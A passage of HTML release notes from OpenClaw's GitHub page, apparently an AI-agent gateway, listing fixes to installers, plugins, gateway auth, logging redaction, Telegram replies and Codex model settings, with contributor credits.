data-hovercard-url="/users/iubns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iubns">@iubns</a>.</li>
<li>Codex/agent: translate <code>--thinking minimal</code> to <code>low</code> for modern Codex models (gpt-5.5, gpt-5.4, gpt-5.4-mini, gpt-5.2) at request build time so the first turn is accepted instead of paying a wasted call + retry-with-low fallback. Older Codex models still receive <code>minimal</code> directly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329994264" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71946" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71946/hovercard" href="https://github.com/openclaw/openclaw/issues/71946">#71946</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Plugins/uninstall: remove tracked plugin files from their recorded managed extensions root even when the current state directory points somewhere else, so <code>openclaw plugins uninstall --force</code> does not leave the plugin discoverable. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/runtime: add <code>agentRuntime.id</code> as the canonical config key, migrate legacy runtime-policy configs with <code>openclaw doctor --fix</code>, route canonical Anthropic models through <code>claude-cli</code> without passing CLI backend aliases to embedded harness selection, and load CLI backend owner plugins before channel startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330015913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71957" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71957/hovercard" href="https://github.com/openclaw/openclaw/issues/71957">#71957</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>CLI/update: guard Windows scheduled-task stops by state and timeout so auto-update restart cannot hang indefinitely on <code>schtasks /End</code> before stale-listener cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306617089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69970" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69970/hovercard" href="https://github.com/openclaw/openclaw/issues/69970">#69970</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yangswld/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yangswld">@yangswld</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sherlock-huang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sherlock-huang">@sherlock-huang</a>.</li>
<li>Windows install/Lobster: execute <code>pnpm.exe</code> directly when <code>npm_execpath</code> points at the native pnpm binary, add an installed-package fallback for the Lobster embedded runtime, and include the Lobster runner regression test in Windows CI. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298637607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69456" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69456/hovercard" href="https://github.com/openclaw/openclaw/issues/69456">#69456</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/igormf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/igormf">@igormf</a>.</li>
<li>Gateway/install: refresh loaded gateway service installs when the current service embeds stale gateway auth instead of returning already-installed, avoiding LaunchAgent token-mismatch loops after token rotation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318448606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70752/hovercard" href="https://github.com/openclaw/openclaw/issues/70752">#70752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hyspacex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hyspacex">@hyspacex</a>.</li>
<li>Update: ignore bundled plugin <code>.openclaw-install-stage</code> directories during global install verification and packaged dist pruning so leftover runtime-dep staging files do not turn successful updates into <code>unexpected packaged dist file</code> failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329154464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71752/hovercard" href="https://github.com/openclaw/openclaw/issues/71752">#71752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/waynegault/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/waynegault">@waynegault</a>.</li>
<li>CLI/update: fail package updates when post-update plugin sync fails and refresh legacy npm plugin install records before trusting unchanged artifacts, preventing successful updates from restarting with stale or failed plugin state. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Release/update: reject pre-populated bundled plugin <code>.openclaw-install-stage</code> directories, including mixed-case path variants, before package inventory generation so release tarballs cannot ship poisoned runtime-dependency staging debris. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329154464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71752/hovercard" href="https://github.com/openclaw/openclaw/issues/71752">#71752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Node runtime: keep node-host retry timers alive across Gateway restarts and exit on terminal credential pauses so supervised nodes do not become silent zombies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304346722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69800" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69800/hovercard" href="https://github.com/openclaw/openclaw/issues/69800">#69800</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/meroli28/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/meroli28">@meroli28</a>.</li>
<li>Gateway/plugins: stop persisted WhatsApp auth state from activating bundled channel runtime-dependency repair during startup when <code>channels.whatsapp</code> is absent, avoiding npm/git stalls on packaged Linux installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330154277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71994" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71994/hovercard" href="https://github.com/openclaw/openclaw/issues/71994">#71994</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiao398008/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiao398008">@xiao398008</a>.</li>
<li>Gateway/device tokens: enforce caller-scope containment inside token rotation and revocation so pairing-only sessions cannot mutate higher-scope operator tokens. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330129522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71990" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71990/hovercard" href="https://github.com/openclaw/openclaw/issues/71990">#71990</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coygeek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coygeek">@coygeek</a>.</li>
<li>Plugins/channels: keep security checks, thread-binding placement, provider summaries, health formatting, and message action labels on read-only or already-loaded channel metadata instead of importing full channel runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/status: keep config-only channel labels and status security summaries from importing plugin runtime modules just to render metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Sessions/channels: stop group-session metadata from loading bundled channel runtime just to classify <code>#channel</code> subjects, using only already-loaded channel capabilities on that path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/channels: keep native command and native skill <code>auto</code> defaults on static channel metadata so config, audit, and command-list checks do not load channel runtime just to read those defaults. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/channels: keep channel remove selection and all-channel capabilities summaries on read-only plugin metadata, loading channel runtime only for the selected mutation path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: keep Provider Index preview rows out of <code>models list --all --provider &lt;id&gt;</code> when the owning provider plugin is disabled, preserving config authority for cold catalog fallbacks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/model runs: keep <code>openclaw infer model run</code> on explicit OpenRouter models from loading the full provider catalog or inheriting chat-agent silent-reply policy, restoring non-empty one-shot probe output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289787526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68791" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68791/hovercard" href="https://github.com/openclaw/openclaw/issues/68791">#68791</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/limpredator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/limpredator">@limpredator</a>.</li>
<li>Installer/macOS: rerun Homebrew install steps without the gum spinner when raw-mode ioctl failures occur, and avoid claiming <code>node@24</code> was installed when the Homebrew keg binary is missing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312670571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70411" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70411/hovercard" href="https://github.com/openclaw/openclaw/issues/70411">#70411</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1fanwang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1fanwang">@1fanwang</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dad-io/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dad-io">@dad-io</a>.</li>
<li>Installer: load nvm before Node.js detection so <code>curl | bash</code> installs respect nvm-managed Node instead of stale system Node. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093236636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49556" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49556/hovercard" href="https://github.com/openclaw/openclaw/issues/49556">#49556</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heavenlxj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heavenlxj">@heavenlxj</a>.</li>
<li>Installer/Windows: route PowerShell install failures through a top-level handler so <code>iwr ... | iex</code> returns control to the current shell while direct script-file runs still exit non-zero. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4034858716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38054/hovercard" href="https://github.com/openclaw/openclaw/issues/38054">#38054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PwrSrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PwrSrg">@PwrSrg</a>.</li>
<li>CLI/Volta: respawn raw <code>openclaw</code> CLI runs through the named <code>node</code> shim when the current Node executable resolves to <code>volta-shim</code>, avoiding direct shim execution failures in non-interactive shells. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288940390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68672" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68672/hovercard" href="https://github.com/openclaw/openclaw/issues/68672">#68672</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sanchezm86/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sanchezm86">@sanchezm86</a>.</li>
<li>Installer: warn when multiple npm global roots contain OpenClaw installs, showing active Node/npm/openclaw plus each install path and version so stale version-manager installs are visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4044590366" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40839/hovercard" href="https://github.com/openclaw/openclaw/issues/40839">#40839</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhixianio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhixianio">@zhixianio</a>.</li>
<li>Cron/tasks: recover completed cron task ledger records from durable run logs and job state before marking them <code>lost</code>, reducing false <code>backing session missing</code> audit errors for isolated cron runs and keeping offline CLI audit from treating its empty local cron active-job set as authoritative. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330026583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71963/hovercard" href="https://github.com/openclaw/openclaw/issues/71963">#71963</a>.</li>
<li>Docker: copy patched dependency files into runtime images so downstream <code>pnpm install</code> layers keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293534495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69224" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69224/hovercard" href="https://github.com/openclaw/openclaw/issues/69224">#69224</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a>.</li>
<li>Package: include patched dependency files in the published npm package so downstream installs can resolve <code>patchedDependencies</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293534495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69224" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69224/hovercard" href="https://github.com/openclaw/openclaw/issues/69224">#69224</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/channels: treat malformed bundled channel plugin loaders that return <code>undefined</code> as unavailable instead of crashing config and help paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291595561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69044" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69044/hovercard" href="https://github.com/openclaw/openclaw/issues/69044">#69044</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankhli843/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankhli843">@frankhli843</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Scripts/watch: show corrupted dependency package-config recovery guidance when <code>gateway:watch</code> fails during watcher startup, without double-logging unrelated import failures. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4184421615" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58780" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58780/hovercard" href="https://github.com/openclaw/openclaw/pull/58780">#58780</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roytong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roytong9">@roytong9</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Signal: read signal-cli RPC, health checks, and SSE events through Node's HTTP client so Node 24/25 fetch regressions do not break Signal sends or inbound events. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112941905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51716" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51716/hovercard" href="https://github.com/openclaw/openclaw/issues/51716">#51716</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4122411587" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53040/hovercard" href="https://github.com/openclaw/openclaw/issues/53040">#53040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Barukimang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Barukimang">@Barukimang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/minupla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/minupla">@minupla</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Skills/Docker: run npm-backed skill dependency installs with an OpenClaw-managed user prefix so non-root Docker images do not write to <code>/usr/local</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4193497158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59601/hovercard" href="https://github.com/openclaw/openclaw/issues/59601">#59601</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chanjarster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chanjarster">@chanjarster</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/runtime: submit heartbeat, cron, and exec wakeups as transient runtime context instead of visible user prompts, keeping synthetic system work out of chat transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261476582" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66496/hovercard" href="https://github.com/openclaw/openclaw/issues/66496">#66496</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264783156" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66814" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66814/hovercard" href="https://github.com/openclaw/openclaw/issues/66814">#66814</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeades/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeades">@jeades</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mandomaker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mandomaker">@mandomaker</a>.</li>
<li>Telegram: include native quote excerpts automatically for threaded replies and reply tags when the original Telegram text is available, without adding another config knob. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3884461774" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/6975/hovercard" href="https://github.com/openclaw/openclaw/issues/6975">#6975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rex05ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rex05ai">@rex05ai</a>.</li>
<li>Node/Linux: make <code>openclaw node install</code> enable and restart the <code>openclaw-node</code> systemd unit instead of the gateway unit on node-only VMs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285532256" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68287" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68287/hovercard" href="https://github.com/openclaw/openclaw/issues/68287">#68287</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dlebee-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dlebee-agent">@dlebee-agent</a>.</li>
<li>Browser/CDP: retry transient raw-CDP WebSocket handshake failures before any browser command is sent, and reconnect stale persistent Playwright CDP sessions for safe tab-list reads without replaying mutating browser actions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276826431" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67728" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67728/hovercard" href="https://github.com/openclaw/openclaw/issues/67728">#67728</a>.</li>
<li>Gateway/Linux: retry <code>systemctl --user enable</code> after a second daemon reload when the freshly written gateway unit is not visible yet on migrated systemd installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246585581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65184" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65184/hovercard" href="https://github.com/openclaw/openclaw/issues/65184">#65184</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liushuaiiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liushuaiiu">@liushuaiiu</a>.</li>
<li>Telegram: preserve exact selected quote text when sending native quote replies, and retry with legacy replies if Telegram rejects quote parameters. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330007852" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71952" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71952/hovercard" href="https://github.com/openclaw/openclaw/pull/71952">#71952</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rubencu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rubencu">@rubencu</a>.</li>
<li>Plugins/CLI: preserve manifest name, description, format, and source metadata in cold <code>openclaw plugins list</code> output without importing plugin runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Security/audit: read channel exposure and plugin allowlist ownership from read-only plugin index metadata so cold audits do not depend on loaded channel runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/chat: keep <code>/plugins list</code>, <code>/plugins enable</code>, and <code>/plugins disable</code> on the persisted plugin index path so chat plugin management does not load diagnostic/runtime plugin registries before execution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/doctor: read workspace plugin status and legacy web-search ownership through installed-index manifest metadata instead of broad manifest registry scans. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/agents: read channel provider status from read-only plugin index metadata for text <code>agents list</code> output instead of the loaded channel registry. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Logging: redact configured secret patterns at console and file-log sink exits so credentials that reach the logger are masked before terminal display or JSONL persistence. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279976745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67953" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67953/hovercard" href="https://github.com/openclaw/openclaw/issues/67953">#67953</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ziy1-Tan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ziy1-Tan">@Ziy1-Tan</a>.</li>
<li>Gateway/services: refuse process and service mutations from an older OpenClaw binary when the config was last written by a newer version, preventing split-brain installs from stopping or rewriting newer gateway services. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4164454666" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57079" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57079/hovercard" href="https://github.com/openclaw/openclaw/issues/57079">#57079</a>.</li>
<li>Gateway: reserve <code>/healthz</code> and <code>/readyz</code> ahead of plugin, canvas, and Control UI HTTP stages so liveness/readiness probes still answer when a later route handler stalls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4301852326" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69674" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69674/hovercard" href="https://github.com/openclaw/openclaw/issues/69674">#69674</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Xike-Creek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Xike-Creek">@Xike-Creek</a>.</li>
<li>Logging: load <code>logging.file</code> and redaction settings directly from the active OpenClaw config path in bundled runtimes, so packaged gateways stop falling back to <code>/tmp/openclaw</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4191142978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59370" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59370/hovercard" href="https://github.com/openclaw/openclaw/issues/59370">#59370</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268830246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67168" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67168/hovercard" href="https://github.com/openclaw/openclaw/issues/67168">#67168</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207216477" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61295" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61295/hovercard" href="https://github.com/openclaw/openclaw/issues/61295">#61295</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/KeaneYan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/KeaneYan">@KeaneYan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pan9hu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pan9hu">@Pan9hu</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zsjlovelike/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" 